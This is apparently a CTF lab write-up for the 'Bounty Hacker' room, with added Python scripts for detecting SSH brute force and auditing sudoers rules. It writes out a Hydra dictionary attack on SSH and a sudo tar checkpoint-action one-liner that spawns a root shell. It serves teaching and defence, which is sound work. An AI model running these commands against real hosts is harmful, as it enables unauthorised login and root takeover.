
[Linux] Bounty Hacker
Enumeration
sudo nmap 10.10.10.243

sudo nmap -A -p 21,22,80 10.10.10.243

HTTP
The website doesn't reveal any crucial information for the pentest.
FTP
We see that we can make an anonymous login on the ftp service.
ftp 10.10.170.79

There are two files on the FTP server:
task.txt, which contains some indications "signed" by someone called lin;
locks.txt, which contains a list of meaningless-looking words.

Exploitation
One hint would be to use locks.txt as a wordlist for a dictionary attack on lin's password for the SSH service.
hydra -s 22 -l lin -P locks.txt 10.10.10.243 ssh -V

Yes! It works. We can use this password to connect to the target via SSH.

We find the user flag this way in user.txt.
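From the defender's side, the attack above leaves a very characteristic trace: a burst of "Failed password" lines for one user from one source in sshd's auth log, often followed by an "Accepted password" line. The following detector is an added example (not part of the original write-up); the auth.log lines, hostnames, timestamps and source addresses are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log excerpt (not from the original page): a fast
# burst of failures followed by a success from 10.0.0.5, and an unrelated
# single failure plus a much later success from 10.0.0.9.
SAMPLE_AUTH_LOG = """\
Mar  1 10:00:01 target sshd[1201]: Failed password for lin from 10.0.0.5 port 41000 ssh2
Mar  1 10:00:01 target sshd[1202]: Failed password for lin from 10.0.0.5 port 41001 ssh2
Mar  1 10:00:02 target sshd[1203]: Failed password for lin from 10.0.0.5 port 41002 ssh2
Mar  1 10:00:02 target sshd[1204]: Failed password for lin from 10.0.0.5 port 41003 ssh2
Mar  1 10:00:03 target sshd[1205]: Failed password for lin from 10.0.0.5 port 41004 ssh2
Mar  1 10:00:03 target sshd[1206]: Failed password for lin from 10.0.0.5 port 41005 ssh2
Mar  1 10:00:04 target sshd[1207]: Accepted password for lin from 10.0.0.5 port 41006 ssh2
Mar  1 10:30:00 target sshd[1300]: Failed password for lin from 10.0.0.9 port 50000 ssh2
Mar  1 11:30:00 target sshd[1301]: Accepted password for lin from 10.0.0.9 port 50001 ssh2
"""

# Matches the standard OpenSSH password-auth log lines (syslog format).
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)


def parse(log_text, year=2024):
    """Turn auth.log text into (timestamp, result, user, src) tuples.
    syslog lines carry no year, so one is supplied by the caller."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["src"]))
    return events


def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Sliding-window detector keyed on (source, user).

    Raises an alert once `threshold` failures fall inside `window_seconds`;
    a later 'Accepted' while failures are still in the window marks the
    alert as a probable successful guess (the highest-priority case)."""
    recent = defaultdict(list)  # (src, user) -> failure timestamps in window
    alerts = {}                 # (src, user) -> alert details
    for ts, result, user, src in events:
        key = (src, user)
        recent[key] = [t for t in recent[key]
                       if (ts - t).total_seconds() <= window_seconds]
        if result == "Failed":
            recent[key].append(ts)
            if key in alerts:
                alerts[key]["failures"] += 1
            elif len(recent[key]) >= threshold:
                alerts[key] = {"failures": len(recent[key]),
                               "first_seen": recent[key][0],
                               "success_after": False}
        elif result == "Accepted" and key in alerts and recent[key]:
            alerts[key]["success_after"] = True
    return alerts


if __name__ == "__main__":
    for (src, user), info in detect_bruteforce(parse(SAMPLE_AUTH_LOG)).items():
        tag = "LOGIN SUCCEEDED AFTER BURST" if info["success_after"] else "burst"
        print(f"{src} -> {user}: {info['failures']} failures since "
              f"{info['first_seen']:%H:%M:%S} [{tag}]")
```

Tune `threshold` and `window_seconds` to the host's normal failure rate; the point of tracking the "Accepted" line is that a successful login right after a burst is the event worth paging on, not the burst alone.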
Privilege escalation
For escalation, a good habit is to check which sudo commands the user is allowed to run on the target.
sudo -l

We can look the binary up on GTFOBins to see how it can be abused with sudo.
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Remediation
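The root cause of the escalation above is a sudoers rule that lets a low-privilege user run tar as root with arbitrary arguments, so tar's `--checkpoint-action` can be turned into a root shell. The following audit script is an added example (not from the original write-up): the sudoers excerpts are constructed, since the real `sudo -l` output is not shown on the page, and the list of shell-capable binaries is an illustrative subset, with tar being the one this room exploits.

```python
import os
import re
import shlex

# Constructed sudoers excerpts (hypothetical; the page does not show the
# actual rule). The weak form permits any tar invocation as root.
WEAK_SUDOERS = """\
# allow lin to run tar without a password
lin ALL=(root) NOPASSWD: /bin/tar
"""

# Hardened form: the same user may run exactly one fixed command line, so
# extra options such as --checkpoint-action are rejected by sudo itself.
HARDENED_SUDOERS = """\
lin ALL=(root) NOPASSWD: /bin/tar -cf /var/backups/home.tar /home/lin
"""

# Illustrative subset of binaries known to be able to spawn a shell or run
# arbitrary commands when executed under sudo (tar is the one used above).
SHELL_CAPABLE = {"tar", "vim", "vi", "find", "less", "more", "awk",
                 "python3", "perl", "bash", "sh", "env"}

# user  host = (runas) TAG: cmd1, cmd2 ...   (comments and blank lines skipped)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+?)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)


def audit_sudoers(text):
    """Return a list of (user, command_spec, reason) findings for rules that
    grant a root shell, either directly (ALL) or through a shell-capable
    binary with unrestricted or wildcard arguments."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for spec in m["cmds"].split(","):
            spec = spec.strip()
            parts = shlex.split(spec)
            if not parts:
                continue
            binary = os.path.basename(parts[0])
            args = parts[1:]
            if parts[0] == "ALL":
                findings.append((m["user"], spec, "ALL commands permitted"))
            elif binary in SHELL_CAPABLE and not args:
                findings.append((m["user"], spec,
                                 f"{binary} with arbitrary arguments can spawn a root shell"))
            elif binary in SHELL_CAPABLE and "*" in args:
                findings.append((m["user"], spec,
                                 f"{binary} with a wildcard argument still accepts extra options"))
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_SUDOERS), ("hardened", HARDENED_SUDOERS)):
        print(f"{label}: {audit_sudoers(text) or 'no findings'}")
```

Pinning the full argument list is the simplest fix; where users genuinely need flexible archiving, a root-owned wrapper script with a fixed command line is the usual replacement, since sudo compares the invoked command line against the rule literally.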